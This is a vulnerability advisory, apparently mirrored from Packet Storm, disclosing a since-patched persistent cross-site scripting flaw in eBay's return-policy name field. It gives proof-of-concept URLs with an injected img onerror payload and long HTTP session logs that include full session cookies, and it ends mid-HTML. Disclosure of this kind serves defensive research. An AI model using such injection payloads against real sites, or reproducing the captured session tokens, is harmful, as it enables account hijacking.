PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source: http://packetstorm.wowhacker.com/1504-exploits/VL-1227.txt
-
- ebay
- persistent
-
(and 3 more)
Tagged with:
-
Document Title: =============== Ebay Inc Xcom #7 - (Policy) Persistent Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1228 Release Date: ============= 2015-03-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1228 Common Vulnerability Scoring System: ==================================== 4 Product & Service Introduction: =============================== eBay Inc. is an American multinational internet consumer-to-consumer corporation, headquartered in San Jose, California. It was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is now a multi-billion dollar business with operations localized in over thirty countries. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sellings, the website has since expanded to include `Buy It Now` standard shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements online event ticket trading online money transfers and other services. (Copy of the Homepage: http://en.wikipedia.org/wiki/EBay ) Abstract Advisory Information: ============================== The Vulnerability Laboratory Research Team discovered mutliple persistent input validation web vulnerabilities in the official Ebay Xcom Policy Web-Application (CMS & API). Vulnerability Disclosure Timeline: ================================== 2014-03-16: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH) 2014-03-17: Vendor Notification (eBay Inc - Security Research Team) 2014-04-16: Vendor Response/Feedback (eBay Inc - Security Research Team) 2015-03-19: Vendor Fix/Patch (eBay Inc - Xcom Developer Team) 2015-03-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Ebay Inc. Product: Ebay Inc - Official WebSite Magento Application & API 2014 Q1 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple application-side input validation web vulnerabilities has been discovered in the official Ebay Xcom Policy Web-Application (CMS & API). A persistent validation web vulnerability allows remote attackers to inject malicious script codes to the application-side of the affected ebay online-service. The vulnerability is located in the `my ebay account > return policy > edit returm policy module. The vulnerable input is the return policy name value. The persistent script code execution occurs in the affected vulnerable sections of the connected `businesspolicy/manage` and `Activity Log - Item Listing` modules. The attack vector is persistent and the severity is medium. The security risk of the persistent web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.0. Exploitation of the persistent input validation vulnerability requires a low privileged web-application user account and low user interaction. Successful exploitation results in session hijacking, persistent phishings attacks, persistent external redirect and malware loads or persistent manipulation of affected and connected module context. Request Method(s): [+] POST Vulnerable Module(s): [+] My Account > Return Policy > Edit Return Policy (http://www.bizpolicy.ebay.com/businesspolicy/) Vulnerable Input(s): [+] Edit return policy > Policy name Vulnerable Parameter(s): [+] name Affected Module(s): [+] ebay.com/businesspolicy/manage [+] Activity Log - Item Listing > Name Proof of Concept (PoC): ======================= The application-side cross site web vulnerability can be exploited by remote attackers with low privileged application user account and low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Manage your business policies http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return+Policy+1+ %22%3E%3Cimg+src%3Dx+onerror%3Dprompt([PERSISTENT INJECTED SCRIPT CODES!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money +Back&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=&_=1395079926788 PoC: Manage your business policies <a href="return?totalPages=1&profileType=RETURN_POLICY&profileId=52844186015&pageNumber=1&source=manage">Return Policy 1 [PERSISTENT SCRIPT CODE EXECUTION!]"><img src="x" onerror="prompt(23);"></a> --- PoC Session Logs [GET] (Injection)--- Status: 200[OK] GET http://www.bizpolicy.ebay.com/businesspolicy/return?profileId=52844186015&mode=edit&catId=ALL&profileName=Return++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&profileDesc=Returns+Accepted%2C+Buyer%2C+14+Days%2C+Money+Back+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E++++%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&catDefault=on&returnsAcceptedOption=ReturnsAccepted&returnsWithinOption=Days_14&refundOption=MoneyBack&shippingCostPaidByOption=Buyer&description=+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E+%22%3E%3C[MALICIOUS INJECTED SCRIPT CODE!])%3B%3E&_=1395079183016 Load Flags[LOAD_BACKGROUND ] Gr???e des Inhalts[-1] Mime Type[application/json] Request Header: Host[www.bizpolicy.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://www.bizpolicy.ebay.com/businesspolicy/return?totalPages=1&profileId=52844186015&pageNumber=1&source=manage] Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Edv%3D532737c1%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5Epsi%3DAMiGpAAE*%5E; dp1=bkms/in56e99ed8^u1f/Benjamin55086b58^tzo/-3c532745e8^idm/153274c6b^exc/0%3A0%3A0%3A0534ec4d8^pcid/159931376355086b58^reg/%5EflagReg%3D1%5E56e99ed8^mms/0.53272b71.053288945^mpc/0%7C77533466d8^a1p/053288958^u1p/MjAxNC5rdW56bQ**55086b58^bl/DE56e99ed8^pbf/%2340000000000081a88200000455086b58^; s=BAQAAAUSucEmyAAWAAAwAClMoiVgxMjI1NjM3OTA2APgAIFMoiVhkMGE1YWU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAAGAAFTKIlYMAFKABhTKIlYNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiVgjMgASAApTKIlYdGVzdENvb2tpZQA9AApTKIlYMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKIlYJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TKIlYMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOQQxMzk1MDc5MzUwOjAAAwABUyiJWDAv3s3bBB0RgoZUFN7eKtp3q+XXQw**; nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa1gwMDAwMDAwMQC0AAFTJ0XoMAFkAANVCGtYIzhhADMACVUIa1gzNDEyOCxERVUAywABUyc+4DkAmgALUynJ3TIwMTQua3Vuem1uAEAAClUIa1gyMDE0Lmt1bnptABAAClUIa1gyMDE0Lmt1bnptAPMAIlUIa1gkMiRBUEtoTlkvUCQudWpDZ0RKQ0hiLnZtT281ekxSVHoxAMoAIFyNOVhjNzdjZjNkZjE0NDBhMzU4NmMyNDRhZDRmZmZmZmU0ZgFNABhVCGtYNTMyNzM3Y2EuMC4xLjIuMTM2LjAuMC4yAAQAClUIWl0yMDE0Lmt1bnptAJwAOFUIa1huWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PQFMABhVCGtYNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4ymyXRGsd3A9RVp8GyedSQ2Mpg46Y*; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa1gxMjI1NjM3OTA2LzA7ps7P/+muFmbIebGiTM4y7QojOkA*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa1g1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjLdM4p5xXUvbFN7uT+3s6eDqkVrhQ**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=A6DA3F8E8AAAD1275E907380FF01C01A; ds2=sotr/b7qgDzzzzzzz^] Connection[keep-alive] Response Header: rlogid[t6al%7Cwliodz%3F%3Cwk%7D%3Ee36e*715f-144d1330b33-0x95] Set-Cookie[JSESSIONID=5C2569C0FFBDC86ABDFC0BFBE77658C6; Path=/ ds2=;Domain=.ebay.com;Path=/ ds1=ats/1395074781098;Domain=.ebay.com;Path=/ ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c0048002004%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E;Domain=.ebay.com;Path=/ cssg=d0a5ae451440a428b382fe32fffffe84;Domain=.ebay.com;Path=/ ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQuzK7o*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/; HttpOnly dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^exc/0%3A0%3A0%3A0534ec513^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56e99f13^mpc/0%7C7753346713^mms/0.53272b71.053288945^a1p/053288993^u1p/MjAxNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086b93^;Domain=.ebay.com;Expires=Wed, 16-Mar-2016 17:59:47 GMT;Path=/ s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1YWU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9AApTKImTMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TKImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOT8xMzk1MDc5MzUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**;Domain=.ebay.com;Path=/; HttpOnly secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iWsd46p2pvujmnDykXMnpWKA**;Domain=.ebay.com;Path=/; HttpOnly nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuTIzhhADMACVUIa5MzNDEyOCxERVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApVCGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW56bQDKACBcjTmTYzc3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56bQFMABhVCGuTNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyjT4uLQSg4TVkI;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 17:59:47 GMT;Path=/ lucky9=9393341;Domain=.ebay.com;Expires=Sat, 16-Mar-2019 17:59:47 GMT;Path=/] Content-Encoding[gzip] Content-Type[application/json;charset=UTF-8] Transfer-Encoding[chunked] Date[Mon, 17 Mar 2014 17:59:47 GMT] Server[eBay Server] Status: 200[OK] GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395075357940 Load Flags[LOAD_BACKGROUND ] Gr???e des Inhalts[22] Mime Type[text/plain] Request Header: Host[my.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbayBeta&CurrentPage=MyeBayNextNotificationPreferences&FClassic=true&ssPageName=STRK:ME:MANPX&_trksid=p5039.m2295.l3917] Cookie[ebay=%5EsfLMD%3D1391608831%5Esin%3Din%5Esbf%3D%23200000000000c0048002004%5Edv%3D532737c1%5Ecos%3D1%5Ecv%3D15555%5Ejs%3D1%5E; dp1=bkms/in56e99f13^u1f/Benjamin55086b93^tzo/-3c53274623^idm/153274c6b^exc/0%3A0%3A0%3A0534ec513^pcid/159931376355086b93^reg/%5EflagReg%3D1%5E56e99f13^mpc/0%7C7753346713^mms/0.53272b71.053288945^a1p/053288993^u1p/MjAxNC5rdW56bQ**55086b93^bl/DE56e99f13^pbf/%2340000000000081a88200000455086b93^; s=BAQAAAUSucEmyAAWAAAwAClMoiZMxMjI1NjM3OTA2AAYAAVMoiZMwAPgAIFMoiZNkMGE1YWU0NTE0NDBhNDI4YjM4MmZlMzJmZmZmZmU4NAFKABhTKImTNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAWUAAlMoiZMjMgASAApTKImTdGVzdENvb2tpZQA9AApTKImTMjAxNC5rdW56bQCoAAFTKHhdMQD0ACJTKImTJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQDuAH5TKImTMQZodHRwOi8vbXkuZWJheS5jb20vd3MvZUJheUlTQVBJLmRsbD9NeWVCYXkmbXllYmF5PSZ0b2tlbmlkPTQ4JmN1cnJlbnRwYWdlPU15ZUJheVByZWZlcmVuY2VzJnNzcGFnZW5hbWU9c3VjY2Vzc0FkUHJlZmVyZW5jZXMHAAEAClMoeF0yMDE0Lmt1bnptALgADFMnOT8xMzk1MDc5MzUwOjAAAwABUyiJkzDDEUmmricxEndGpoBjz/CyDgT4jg**; nonsession=BAQAAAUSucEmyAAaAAJ0ACFUIa5MwMDAwMDAwMQC0AAFTJ0YjMAFkAANVCGuTIzhhADMACVUIa5MzNDEyOCxERVUAywACUyc/GzEwAJoAC1Mpyd0yMDE0Lmt1bnptbgBAAApVCGuTMjAxNC5rdW56bQAQAApVCGuTMjAxNC5rdW56bQDKACBcjTmTYzc3Y2YzZGYxNDQwYTM1ODZjMjQ0YWQ0ZmZmZmZlNGYA8wAiVQhrkyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEBTQAYVQhrkzUzMjczN2NhLjAuMS4yLjEzNi4wLjAuMgAEAApVCFpdMjAxNC5rdW56bQFMABhVCGuTNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAJwAOFUIa5NuWStzSFoyUHJCbWRqNndWblkrc0VaMlByQTJkajZBR2tvZW5DNWVMb1FxZGo2eDluWStzZVE9PX7IQgibAoX1mYyjT4uLQSg4TVkI; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa5MxMjI1NjM3OTA2LzA7u3yVKIuPORIyGkkPfr8OcQuzK7o*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa5M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjIkh3iWsd46p2pvujmnDykXMnpWKA**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=37628EA4B997D2976280801A071E51EE; ds2=] Connection[keep-alive] Response Header: Server[Apache-Coyote/1.1] rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.g%6047-144d1334a30-0x133] Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/ ds2=; Domain=.ebay.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; Domain=.ebay.com; Path=/ dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/159931376355086ba3^mpc/0%7C7753346723^pbf/%2340000000000081a88200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg=d0a5ae451440a428b382fe32fffffe84; Domain=.ebay.com; Path=/ s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/; HttpOnly nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; Domain=.ebay.com; Path=/ lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/] Cache-Control[private] Pragma[no-cache] Content-Type[text/plain] Content-Length[22] Date[Mon, 17 Mar 2014 18:00:03 GMT] Status: 200[OK] GET http://my.ebay.com/ws/eBayISAPI.dll?GetGHNotificationsCommand&up=1&ts=-1&_=1395079046614 Load Flags[LOAD_BACKGROUND ] Gr???e des Inhalts[22] Mime Type[text/plain] Request Header: Host[my.ebay.com] User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0] Accept[text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] X-Requested-With[XMLHttpRequest] Referer[http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&CurrentPage=MyeBayPreferences&FClassic=true&ssPageName=STRK:ME:MAPRX] Cookie[ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/159931376355086ba3^mpc/0%7C7753346723^pbf/%2340000000000081a88200000455086ba3^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**; nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; cssg=d0a5ae451440a428b382fe32fffffe84; cid=xAMhIMTTiG9hpoAp%231599313763; lucky9=9393341; npii=btguid/c77cf3df1440a3586c244ad4fffffe4f55086b58^cguid/c77cfce61440a56b23d61f96fe2e024155086b58^; ds1=ats/1395074781098; ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*; secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; shs=BAQAAAUSucEmyAAaAAVUADlMwYV01MTYyMjA1MzEwMDQsM0lQMoD56FArTr0IRZNrcW0RgsFk; JSESSIONID=37628EA4B997D2976280801A071E51EE] Connection[keep-alive] Response Header: Server[Apache-Coyote/1.1] rlogid[p4n%7Cceb%7Cehq%60%3C%3Dsm%7E0a54d.32%3Ef-144d1334c9e-0x132] Set-Cookie[ds1=ats/1395074781098; Domain=.ebay.com; Path=/ ebay=%5EsfLMD%3D1391608831%5Esbf%3D%23200000000000c0048002004%5Ecos%3D1%5Ecv%3D15555%5Esin%3Din%5Ejs%3D1%5Edv%3D532737c1%5E; Domain=.ebay.com; Path=/ dp1=ba1p/0532889a3^bl/DE56e99f23^kms/in56e99f23^reg/%5EflagReg%3D1%5E56e99f23^pcid/159931376355086ba3^pbf/%2340000000000081a88200000455086ba3^mpc/0%7C7753346723^tzo/-3c53274633^exc/0%3A0%3A0%3A0534ec523^mms/0.53272b71.053288945^u1p/MjAxNC5rdW56bQ**55086ba3^u1f/Benjamin55086ba3^idm/153274c6b^; Domain=.ebay.com; Expires=Wed, 16-Mar-2016 18:00:03 GMT; Path=/ ns1=BAQAAAUSucEmyAAaAAKUADVUIa6MxMjI1NjM3OTA2LzA7QZZOFOpy8ayMp8onGgFulfsBYFA*;Domain=.ebay.com;Expires=Tue, 17-Mar-2015 18:00:03 GMT;Path=/; HttpOnly cssg=d0a5ae451440a428b382fe32fffffe84; Domain=.ebay.com; Path=/ s=BAQAAAUSucEmyAAWAAAEAClMoeF0yMDE0Lmt1bnptAAMAAVMoiaMwAWUAAlMoiaMjMgAGAAFTKImjMACoAAFTKHhdMQFKABhTKImjNTMyNzM3YzAuMC4xLjExLjc4LjIuMC4yAAwAClMoiaMxMjI1NjM3OTA2AO4AflMoiaMxBmh0dHA6Ly9teS5lYmF5LmNvbS93cy9lQmF5SVNBUEkuZGxsP015ZUJheSZteWViYXk9JnRva2VuaWQ9NDgmY3VycmVudHBhZ2U9TXllQmF5UHJlZmVyZW5jZXMmc3NwYWdlbmFtZT1zdWNjZXNzQWRQcmVmZXJlbmNlcwcAEgAKUyiJo3Rlc3RDb29raWUA9AAiUyiJoyQyJEFQS2hOWS9QJC51akNnREpDSGIudm1PbzV6TFJUejEA+AAgUyiJo2QwYTVhZTQ1MTQ0MGE0MjhiMzgyZmUzMmZmZmZmZTg0ALgADFMnOU8xMzk1MDc5MzUwOjAAPQAKUyiJozIwMTQua3Vuem1Ejb6V2GvxX+CZLB1SZINlLcDnjA**;Domain=.ebay.com;Path=/; HttpOnly nonsession=BAQAAAUSucEmyAAaAAEAAClUIa6MyMDE0Lmt1bnptAWQAA1UIa6MjOGEABAAKVQhaXTIwMTQua3Vuem0AygAgXI05o2M3N2NmM2RmMTQ0MGEzNTg2YzI0NGFkNGZmZmZmZTRmAMsAAlMnPysxMAFMABhVCGujNTMyNzM3YzAuMC4xLjExLjc4LjMuMC4yAU0AGFUIa6M1MzI3MzdjYS4wLjEuMi4xMzYuMC4wLjIAEAAKVQhrozIwMTQua3Vuem0AMwAJVQhrozM0MTI4LERFVQDzACJVCGujJDIkQVBLaE5ZL1AkLnVqQ2dESkNIYi52bU9vNXpMUlR6MQC0AAFTJ+7wMACaAAtTKcndMjAxNC5rdW56bW4AnAA4VQhro25ZK3NIWjJQckJtZGo2d1ZuWStzRVoyUHJBMmRqNkFHa29lbkM1ZUxvUXFkajZ4OW5ZK3NlUT09AJ0ACFUIa6MwMDAwMDAwMTwIsT4ZdmKze+o6aCD30vVea2+e; Domain=.ebay.com; Expires=Tue, 17-Mar-2015 18:00:03 GMT; Path=/ secses=BAQAAAUSucEmyAAaAAUsAGFUIa6M1MzI3MzdjMC4wLjEuMTEuNzguMi4wLjJ5+5WwmaLoxSDYeRvnyhWgee/Y/g**; Domain=.ebay.com; Path=/ lucky9=9393341; Domain=.ebay.com; Expires=Sat, 16-Mar-2019 18:00:03 GMT; Path=/] Cache-Control[private] Pragma[no-cache] Content-Type[text/plain] Content-Length[22] Date[Mon, 17 Mar 2014 18:00:03 GMT] PoC: Activity log: Return Policy 1 [x] <div> <h2 class="act-title">Activity log: <span id="policy_name">Return Policy 1 "><[PERSISTENT INJECTED SCRIPT CODES!]);"></span></h2> <div id="activityLogContent" class="act-cnt"> <table cellpadding="0" cellspacing="0"> <thead><tr> <th class="first">Date/Time</th> <th class="second">Action</th> <th class="third">Description</th> <th 